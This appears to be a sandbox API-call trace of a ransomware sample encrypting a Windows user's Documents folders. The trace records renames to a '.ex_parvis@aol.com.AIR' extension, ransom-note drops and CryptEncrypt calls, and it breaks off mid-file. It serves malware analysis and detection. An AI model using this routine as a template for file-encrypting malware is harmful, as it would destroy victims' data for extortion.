	[0106.160] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\4qnhujwkxn2itgmtl.csv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\4qnhujwkxn2itgmtl.csv.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.216] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k1_dBv01wMM\\4QnHUJwKXn2ITGmtl.csv.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\k1_dbv01wmm\\4qnhujwkxn2itgmtl.csv.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x51c
	[0106.216] GetProcessHeap () returned 0x540000
	[0106.216] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.216] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=84814) returned 1
	[0106.216] SetFilePointer (in: hFile=0x51c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x14b4e
	[0106.217] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.217] GetProcessHeap () returned 0x540000
	[0106.217] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.217] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.218] WriteFile (in: hFile=0x51c, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.219] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.219] WriteFile (in: hFile=0x51c, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.220] ReadFile (in: hFile=0x51c, lpBuffer=0x609bb8, nNumberOfBytesToRead=0x14b4e, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x609bb8*, lpNumberOfBytesRead=0x3a1f778*=0x14b4e, lpOverlapped=0x0) returned 1
	[0106.223] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed0b1a0, ftCreationTime.dwHighDateTime=0x1d4d00e, ftLastAccessTime.dwLowDateTime=0xb2f099f0, ftLastAccessTime.dwHighDateTime=0x1d4ced7, ftLastWriteTime.dwLowDateTime=0xb2f099f0, ftLastWriteTime.dwHighDateTime=0x1d4ced7, nFileSizeHigh=0x0, nFileSizeLow=0x2716, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qUhhgI8vG.xls", cAlternateFileName="_QUHHG~1.XLS")) returned 0xffffffff
	[0106.223] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed0b1a0, ftCreationTime.dwHighDateTime=0x1d4d00e, ftLastAccessTime.dwLowDateTime=0xb2f099f0, ftLastAccessTime.dwHighDateTime=0x1d4ced7, ftLastWriteTime.dwLowDateTime=0xb2f099f0, ftLastWriteTime.dwHighDateTime=0x1d4ced7, nFileSizeHigh=0x0, nFileSizeLow=0x2716, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qUhhgI8vG.xls", cAlternateFileName="_QUHHG~1.XLS")) returned 0xffffffff
	[0106.223] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dae30
	[0106.224] FindNextFileW (in: hFindFile=0x5dae30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.224] FindNextFileW (in: hFindFile=0x5dae30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0106.224] FindNextFileW (in: hFindFile=0x5dae30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1
	[0106.224] FindNextFileW (in: hFindFile=0x5dae30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6330e90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.224] FindNextFileW (in: hFindFile=0x5dae30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1
	[0106.224] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520
	[0106.227] FindNextFileW (in: hFindFile=0x5dae30, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0
	[0106.227] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.227] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.228] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", dwFileAttributes=0x80) returned 1
	[0106.228] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 64
	[0106.228] GetProcessHeap () returned 0x540000
	[0106.228] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe6) returned 0x56b300
	[0106.228] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss"
	[0106.228] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.228] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.231] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520
	[0106.231] GetProcessHeap () returned 0x540000
	[0106.231] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0106.231] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=0) returned 1
	[0106.231] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x0
	[0106.231] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.231] GetProcessHeap () returned 0x540000
	[0106.231] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.231] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.233] WriteFile (in: hFile=0x520, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.234] WriteFile (in: hFile=0x520, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.234] WriteFile (in: hFile=0x520, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.234] ReadFile (in: hFile=0x520, lpBuffer=0x596410, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596410*, lpNumberOfBytesRead=0x3a1f778*=0x0, lpOverlapped=0x0) returned 1
	[0106.234] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.234] WriteFile (in: hFile=0x520, lpBuffer=0x5964a0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5964a0*, lpNumberOfBytesWritten=0x3a1f778*=0x0, lpOverlapped=0x0) returned 1
	[0106.234] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.234] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.235] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", dwFileAttributes=0x80) returned 1
	[0106.235] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 62
	[0106.235] GetProcessHeap () returned 0x540000
	[0106.235] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe2) returned 0x56b300
	[0106.235] lstrcpyW (in: lpString1=0x56b300, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini"
	[0106.236] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.236] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.238] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520
	[0106.238] GetProcessHeap () returned 0x540000
	[0106.238] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56b300 | out: hHeap=0x540000) returned 1
	[0106.238] GetFileSizeEx (in: hFile=0x520, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=216) returned 1
	[0106.238] SetFilePointer (in: hFile=0x520, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd8
	[0106.238] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.238] GetProcessHeap () returned 0x540000
	[0106.238] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0106.238] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0106.239] WriteFile (in: hFile=0x520, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0106.240] WriteFile (in: hFile=0x520, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0106.240] WriteFile (in: hFile=0x520, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0106.240] ReadFile (in: hFile=0x520, lpBuffer=0x601bd0, nNumberOfBytesToRead=0xd8, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601bd0*, lpNumberOfBytesRead=0x3a1f778*=0xd8, lpOverlapped=0x0) returned 1
	[0106.240] SetFilePointer (in: hFile=0x520, lDistanceToMove=-216, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0106.240] WriteFile (in: hFile=0x520, lpBuffer=0x601cb0*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x601cb0*, lpNumberOfBytesWritten=0x3a1f778*=0xd8, lpOverlapped=0x0) returned 1
	[0106.240] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff
	[0106.240] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dae70
	[0106.241] FindNextFileW (in: hFindFile=0x5dae70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0106.241] FindNextFileW (in: hFindFile=0x5dae70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6330e90, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xe6330e90, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xe6330e90, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0106.241] FindNextFileW (in: hFindFile=0x5dae70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1
	[0106.241] FindNextFileW (in: hFindFile=0x5dae70, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x6228cf40, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0
	[0106.241] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0106.241] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0106.241] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", dwFileAttributes=0x80) returned 1
	[0106.241] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned 77
	[0106.241] GetProcessHeap () returned 0x540000
	[0106.241] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8670
	[0106.241] lstrcpyW (in: lpString1=0x5b8670, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst"
	[0106.241] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR"
	[0106.242] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0106.245] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\voeimd@djhreuu.uhd.pst.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524
	[0106.246] GetProcessHeap () returned 0x540000
	[0106.246] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8670 | out: hHeap=0x540000) returned 1
	[0106.246] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=271360) returned 1
	[0106.246] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x42400
	[0106.246] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0106.246] GetProcessHeap () returned 0x540000
